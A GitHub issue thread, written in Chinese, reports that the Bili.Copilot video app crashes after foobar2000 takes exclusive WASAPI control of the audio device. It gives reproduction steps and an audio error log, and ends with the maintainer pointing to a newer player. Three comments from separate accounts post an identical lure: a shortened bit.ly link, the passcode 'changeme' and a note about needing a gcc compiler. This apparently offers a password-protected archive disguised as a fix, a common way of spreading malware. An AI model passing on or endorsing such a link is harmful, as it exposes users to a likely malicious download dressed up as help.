### ISSUE TITLE
[Bug] 在调用 WASAPI 后播放崩溃

### ISSUE THREAD

**Issue by KaiHuaDou** [Richasy/Bili.Copilot#496]
### Bug 描述

暂停视频后，再使用 WASAPI 输出音频，再次播放会导致哔哩助理崩溃。

### 复现问题的步骤

```plain text
1. 打开哔哩助理
2. 播放任意视频
3. 暂停
4. 打开 foobar2000
5. 选择 WASAPI9event) 输出
6. 切换到哔哩助理
7. 播放视频
8. 崩溃
```

### 预期行为

提示“音频设备被占用”，或者挤掉正在占用的程序

### 应用来源

- [ ] Github
- [X] 微软商店（Microsoft Store）
- [ ] 其它

### 系统版本

- [X] Windows 10 (Build 19041 - 19045)
- [ ] Windows 11 21H2 (Build 22000)
- [ ] Windows 11 22H2 (Build 22621)
- [ ] Windows 11 23H2 (Build 22631)
- [ ] Windows 11 24H2 (Build 26100)
- [ ] 其它 (需注明)

### 运行设备

桌面/平板或笔记本

### 日志记录

```log
2024/09/05 20:48:54.087|Error|core: tls: IO error: End of file
|
2024/09/05 20:48:54.087|Error|core: https: Stream ends prematurely at 190034664, should be 206064222
|
2024/09/05 20:53:33.897|Error|core: Error feeding audio: AUDCLNT_E_DEVICE_INVALIDATED (0x88890004)
|
2024/09/05 20:53:33.930|Error|core: Error initializing device: AUDCLNT_E_DEVICE_IN_USE (0x8889000a)
|
2024/09/05 20:53:33.949|Error|core: Error initializing device: AUDCLNT_E_DEVICE_IN_USE (0x8889000a)
|
2024/09/05 20:53:33.971|Error|core: Error initializing device: AUDCLNT_E_DEVICE_IN_USE (0x8889000a)
|
2024/09/05 20:53:33.989|Error|core: Error initializing device: AUDCLNT_E_DEVICE_IN_USE (0x8889000a)
|
2024/09/05 20:53:34.009|Error|core: Error initializing device: AUDCLNT_E_DEVICE_IN_USE (0x8889000a)
|
2024/09/05 20:53:34.009|Error|core: Bad device retry failed
|
```

### 人人为我，我为人人

我更擅长发现问题

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by Richasy** [comment]
新的版本使用岛播放器应该可以修复这个问题
